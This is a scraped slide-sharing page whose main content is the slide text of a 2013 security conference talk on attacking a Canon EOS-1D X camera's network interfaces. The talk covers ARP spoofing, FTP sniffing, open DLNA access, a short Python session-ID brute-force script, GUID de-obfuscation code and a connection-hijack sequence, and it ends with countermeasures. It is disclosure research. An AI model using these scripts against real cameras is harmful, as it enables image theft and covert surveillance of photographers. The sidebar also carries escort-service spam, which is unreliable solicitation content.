Introduction to PROFIBUS for process automation Andy Verwer
 
SOME_IP_29408.pdf
SOME_IP_29408.pdfSOME_IP_29408.pdf
SOME_IP_29408.pdf
 
C12 Profinet diagnostics during the entire life cycle of production lines a...
C12 Profinet diagnostics during the entire life cycle of production lines a...C12 Profinet diagnostics during the entire life cycle of production lines a...
C12 Profinet diagnostics during the entire life cycle of production lines a...
 
FBLajSIPScenarior.ppt
FBLajSIPScenarior.pptFBLajSIPScenarior.ppt
FBLajSIPScenarior.ppt
 
Chris Swan's CloudExpo Europe presentation "Waves of adoption for Network Fun...
Chris Swan's CloudExpo Europe presentation "Waves of adoption for Network Fun...Chris Swan's CloudExpo Europe presentation "Waves of adoption for Network Fun...
Chris Swan's CloudExpo Europe presentation "Waves of adoption for Network Fun...
 
Advantages of a dual sim 4g router.pdf
Advantages of a dual sim 4g router.pdfAdvantages of a dual sim 4g router.pdf
Advantages of a dual sim 4g router.pdf
 
Decreasing Incident Response Time
Decreasing Incident Response TimeDecreasing Incident Response Time
Decreasing Incident Response Time
 

More from Hackito Ergo Sum

[HES2013] Hacking apple accessories to pown iDevices – Wake up Neo! Your phon...
[HES2013] Hacking apple accessories to pown iDevices – Wake up Neo! Your phon...[HES2013] Hacking apple accessories to pown iDevices – Wake up Neo! Your phon...
[HES2013] Hacking apple accessories to pown iDevices – Wake up Neo! Your phon...Hackito Ergo Sum
 
[HES2013] Nifty stuff that you can still do with android by Xavier Martin
[HES2013] Nifty stuff that you can still do with android by Xavier Martin[HES2013] Nifty stuff that you can still do with android by Xavier Martin
[HES2013] Nifty stuff that you can still do with android by Xavier MartinHackito Ergo Sum
 
[HES2013] Frida IRE – a tool for scriptable dynamic instrumentation in userla...
[HES2013] Frida IRE – a tool for scriptable dynamic instrumentation in userla...[HES2013] Frida IRE – a tool for scriptable dynamic instrumentation in userla...
[HES2013] Frida IRE – a tool for scriptable dynamic instrumentation in userla...Hackito Ergo Sum
 
[HES2014] HackRF A Low Cost Software Defined Radio Platform by Benjamin Vernoux
[HES2014] HackRF A Low Cost Software Defined Radio Platform by Benjamin Vernoux[HES2014] HackRF A Low Cost Software Defined Radio Platform by Benjamin Vernoux
[HES2014] HackRF A Low Cost Software Defined Radio Platform by Benjamin VernouxHackito Ergo Sum
 
[HES2013] Information Warfare: mistakes from the MoDs by Raoul “Nobody” Chiesa
[HES2013] Information Warfare: mistakes from the MoDs by Raoul “Nobody” Chiesa[HES2013] Information Warfare: mistakes from the MoDs by Raoul “Nobody” Chiesa
[HES2013] Information Warfare: mistakes from the MoDs by Raoul “Nobody” ChiesaHackito Ergo Sum
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 

More from Hackito Ergo Sum (6)

[HES2013] Hacking apple accessories to pown iDevices – Wake up Neo! Your phon...
[HES2013] Hacking apple accessories to pown iDevices – Wake up Neo! Your phon...[HES2013] Hacking apple accessories to pown iDevices – Wake up Neo! Your phon...
[HES2013] Hacking apple accessories to pown iDevices – Wake up Neo! Your phon...
 
[HES2013] Nifty stuff that you can still do with android by Xavier Martin
[HES2013] Nifty stuff that you can still do with android by Xavier Martin[HES2013] Nifty stuff that you can still do with android by Xavier Martin
[HES2013] Nifty stuff that you can still do with android by Xavier Martin
 
[HES2013] Frida IRE – a tool for scriptable dynamic instrumentation in userla...
[HES2013] Frida IRE – a tool for scriptable dynamic instrumentation in userla...[HES2013] Frida IRE – a tool for scriptable dynamic instrumentation in userla...
[HES2013] Frida IRE – a tool for scriptable dynamic instrumentation in userla...
 
[HES2014] HackRF A Low Cost Software Defined Radio Platform by Benjamin Vernoux
[HES2014] HackRF A Low Cost Software Defined Radio Platform by Benjamin Vernoux[HES2014] HackRF A Low Cost Software Defined Radio Platform by Benjamin Vernoux
[HES2014] HackRF A Low Cost Software Defined Radio Platform by Benjamin Vernoux
 
[HES2013] Information Warfare: mistakes from the MoDs by Raoul “Nobody” Chiesa
[HES2013] Information Warfare: mistakes from the MoDs by Raoul “Nobody” Chiesa[HES2013] Information Warfare: mistakes from the MoDs by Raoul “Nobody” Chiesa
[HES2013] Information Warfare: mistakes from the MoDs by Raoul “Nobody” Chiesa
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 

Recently uploaded

Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyFrank van der Linden
 

Recently uploaded (20)

Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number Systems
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The Ugly
 

[HES2013] Paparazzi over ip by Daniel Mende

  • 2. www.ernw.de Who we are ¬ Old-school network geeks, working as security researchers for Germany based ERNW GmbH  Independent  Deep technical knowledge  Structured (assessment) approach  Business reasonable recommendations  We understand corporate ¬ Blog: www.insinuator.net ¬ Conference: www.troopers.de 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #2
  • 3. www.ernw.de Agenda ¬ Intro ¬ Transport Protocols ¬ Communication Modes & Attacks ¬ Conclusions 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #3
  • 4. www.ernw.de Intro ¬ A number of current high-end cameras have network interfaces. ¬ We did some research as for their security and potential attack paths. ¬ In the following we focus on Canons new flagship EOS 1D X, but similar problems might be found in other models, of other vendors, too. 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #4
  • 5. www.ernw.de The Camera Canon EOS-1D X 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #5
  • 6. www.ernw.de The Camera ¬ From Canon USA:  A built in Ethernet port allows for fast, easy transfer of images directly to a PC or via a network to clients from live events.  The EOS-1D X is compatible with the new WFT-E6A Wireless File Transmitter for wireless LAN transfer with the IEEE 802.11 a/b/g/n standards. A Bit of Marketing 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #6
  • 7. www.ernw.de The Camera The Ethernet Port 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #7
  • 8. www.ernw.de The Camera WLAN Adapter 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #8
  • 9. www.ernw.de The Target aka. Mr. Reuters 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #9
  • 10. www.ernw.de The Target ¬ One could get the real, unedited images first. ¬ One could upload (bad) images. ¬ One could turn the camera into a surveillance device. What if 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #10
  • 12. www.ernw.de Transport ¬ Wired LAN via built-in Ethernet port or Wireless LAN via WFT-E6A. ¬ Standard TCP/IP (no IPv6, yet). 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #12
  • 13. www.ernw.de Traditional Attacks ¬ ARP-spoofing possible.  No “sticky” ARP entries ¬ ARP-flooding with ~100 packets per second DoS the network stack. ¬ Btw. stack also dies if IPv6 (multicast) is present. Layer 2 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #13
  • 14. www.ernw.de Traditional Attacks ¬ TCP/IP is used for all network communication. ¬ Established connections can be killed via TCP-RST. Layer 3/4 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #14
  • 16. www.ernw.de Communication Modes ¬ FTP Upload Mode ¬ DLNA ¬ Built-in webserver ¬ EOS Utility Overview 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #16
  • 18. www.ernw.de FTP Upload Mode ¬ Target server and credentials configured on camera. ¬ Photos taken are uploaded to the server immediately. Mode of operation 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #18
  • 19. www.ernw.de FTP Upload Mode ¬ As FTP is clear text, credentials can be sniffed. ¬ As well as the complete data transmission ¬ Uploaded pictures can be extracted from network traffic. Downside 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #19
  • 20. www.ernw.de FTP Upload Mode 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #20
  • 21. www.ernw.de FTP Upload Mode 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #21
  • 23. www.ernw.de DLNA mode ¬ Digital Living Network Alliance® ¬ UPnP used for discovery. ¬ DLNA guidelines for file formats, encodings, resolutions. ¬ HTTP and XML used to access media. Overview 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #23
  • 24. www.ernw.de DLNA mode ¬ No authentication. ¬ No restrictions. ¬ Every DLNA client can download _all_ images. ¬ Your Browser could be a DLNA client. Or somebody else's browser. For your camera. Cons 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #24
  • 26. www.ernw.de Built-in webserver ¬ Wireless File Transmitter Server Mode. ¬ Canon USA: “Use a web browser to capture, view and download images remotely” Canon WFT Server 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #26
  • 27. www.ernw.de Built-in webserver ¬ Browser interface uses AJAX. ¬ Embedded webserver only capable of HTTP GET method.  Every other request method is answered with a 404. Canon WFT Server 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #27
  • 28. www.ernw.de Built-in webserver ¬ Authentication via HTTP Basic (RFC 2617) on login page. ¬ Session cookie is used afterwards. ¬ Cookie looks like sessionID=40b1  4 (!!!) byte Session ID  65535 possible IDs Authentication 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #28
  • 29. www.ernw.de Built-in webserver ¬ Session ID Brute force implemented in 6 lines of python. ¬ To check for all possible IDs takes about 20 minutes.  Embedded Webserver is not that responsive. 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #29
  • 30. www.ernw.de import requests target_uri = 'http://192.168.1.103/api/cam/lvoutput' target_string = 'SESSION_ERR' for i in xrange(0xffff): if (i != 0 and i%1000 == 0): print str(i) + 'IDs checked' r = requests.get(target_uri, cookies={'sessionID': '%x' %i}) if r.text.find(target_string) == -1: print 'SessionID is : sessionID=%x' %i break 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #30
  • 31. www.ernw.de5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #31
  • 32. www.ernw.de Built-in webserver ¬ Full access to Live View, stored photos and camera settings. ¬ You surf – We brute. recap 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #32
  • 33. www.ernw.de Built-in webserver ¬ Camera in WFT Server mode. ¬ Valid session opened by user. ¬ Some minutes of time. Requirements 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #33
  • 35. www.ernw.de EOS Utility mode The Utility 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #35
  • 36. www.ernw.de EOS Utility mode The Utility 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #36
  • 37. www.ernw.de EOS Utility mode ¬ Allows remote control of all non- manual camera functions. ¬ Pictures can be up- and downloaded. ¬ Possibly even more (sound recording anyone?) Overview 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #37
  • 38. www.ernw.de EOS Utility mode ¬ SSDP and MDNS used for discovery. ¬ PTP/IP used for communication. ¬ Needs initial camera <-> software pairing. Technical 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #38
  • 39. www.ernw.de EOS Utility mode ¬ At first use, credentials needs to be exchanged between the camera and the client software. ¬ Camera must be put into pairing mode via camera menu. ¬ Camera signals the need for pairing via MDNS. Pairing 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #39
  • 40. www.ernw.de5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #40
  • 41. www.ernw.de EOS Utility mode Pairing 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #41
  • 42. www.ernw.de EOS Utility mode ¬ Client software connects to camera via PTP/IP. ¬ PTP/IP Authentication is successful regardless of the credentials. ¬ Credentials (hostname, GUID) are stored on the camera. Pairing 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #42
  • 44. www.ernw.de PTP/IP ¬ Picture Transfer Protocol over Internet Protocol. ¬ ISO 15740. ¬ Standardized by International Imaging Industry Association 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #44
  • 45. www.ernw.de PTP/IP ¬ Wrapper for PTP with header: 4 byte length (little endian) 4 byte type (little endian) data Packet format 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #45
  • 46. www.ernw.de PTP/IP Layering 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #46
  • 47. www.ernw.de PTP/IP ¬ PTPIP_INIT_COMMAND_REQUEST  Includes authentication data: 16 byte GUID hostname string Authentication 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #47
  • 48. www.ernw.de PTPIP_INIT_COMMAND_REQUEST 2a 00 00 00 01 00 00 00 eb 7a 78 9d 69 cb 64 4e a3 e0 fc 96 ef 59 79 42 73 00 65 00 72 00 76 00 65 00 72 00 00 00 00 00 01 00 Paket length = 42 byte Paket type = 0x01 = PTPIP_INIT_COMMAND_REQUEST GUID Hostname = “server” @ utf16 Trailer 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #48
  • 50. www.ernw.de PTP ¬ Picture Transfer Protocol ¬ Standardized by International Imaging Industry Association ¬ ISO 15740 ¬ Lots of proprietary vendor extensions. Explained 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #50
  • 51. www.ernw.de PTP ¬ Designed for use over USB ¬ Fixed length ¬ 2 byte Msg Code ¬ 4 byte Session ID ¬ 4 byte Transaction ID ¬ 5 times 4 byte Parameter or Data Packet format 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #51
  • 52. www.ernw.de PTP ¬ Lot of standardized codes like:  PTP_GetDeviceInfo  PTP_OpenSession  PTP_CloseSession  PTP_GetStorageIDs ¬ Also Vendor specific codes like:  PTP_CANON_GetCustomizeSpec  PTP_CANON_GetCustomizeItemInfo Message Codes 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #52
  • 53. www.ernw.de PTP ¬ Thankfully there are some implementations around. ¬ We decided to go with libgphoto2. ¬ Basic PTP/IP support is included as well. Use of 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #53
  • 55. www.ernw.de Attack ¬ Client Hostname easy discoverable, but not needed.  Camera also excepts connections with a different hostname. ¬ GUID unknown to client software. ¬ Obfuscated GUID is broadcasted by the cam via UPNP. Getting the Credentials 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #55
  • 56. www.ernw.de5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #56
  • 57. www.ernw.de tmp = mdns_info.getProperties()['tid.canon.com'].split('-') guid = [] l = lambda s: [ s[i:i+2:] for i in xrange(0,len(s),2) ][::-1] for i in xrange(0,3): guid += l(tmp[i]) guid += tmp[3] guid += tmp[4] guid = "".join(guid) guid = eb7a789d69cb644ea3e0fc96ef597942 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #57
  • 58. www.ernw.de The Attack ¬ Camera only allows one connection. ¬ Already connected client needs to be disconnected. ¬ TCP-RST the established PTP/IP connection. Connecting to the Camera 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #58
  • 59. www.ernw.de Attack ¬ Listen for the Cam on MDNS. ¬ De-obfuscate Authentication data. ¬ Disconnect connected Client Software. ¬ Connect via PTP/IP. ¬ Have Phun (-; Process 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #59
  • 60. www.ernw.de5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #60
  • 61. www.ernw.de Attack outlined ¬ Photograph uses hotel / Starbucks WLAN, which isn’t unlikely during events (think of Grammy Awards few days ago). ¬ Almost anybody in the same LAN can download the images from the camera (and even more). So you can write it down 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #61
  • 62. www.ernw.de Countermeasures ¬ Enable network functionality only in trusted Networks. ¬ Use WPA and a secure passphrase for (your trusted) WLAN. 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #62
  • 63. www.ernw.de Conclusions ¬ High-end cameras are yet another daily life item equipped with networking capabilities incl. full-blown IP stacks. ¬ Once more, their device-specific network technologies have been designed and implemented without (too much) security in mind. ¬ Again, this leads to (classes of) attacks previously unknown to their non- networked counterparts. 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #63
  • 64. www.ernw.de Next Steps New series of DSLRs (EOS 6D)  Built-in Wireless Access Point  New communication protocol for IOS/Android App New series of camcorder(XA20, XA25) 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #64
  • 65. www.ernw.de There’s never enough time… 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #65 THANK YOU… ...for yours!
  • 66. www.ernw.de Questions? © ERNW GmbH | Breslauer Str. 28 | D-69124 66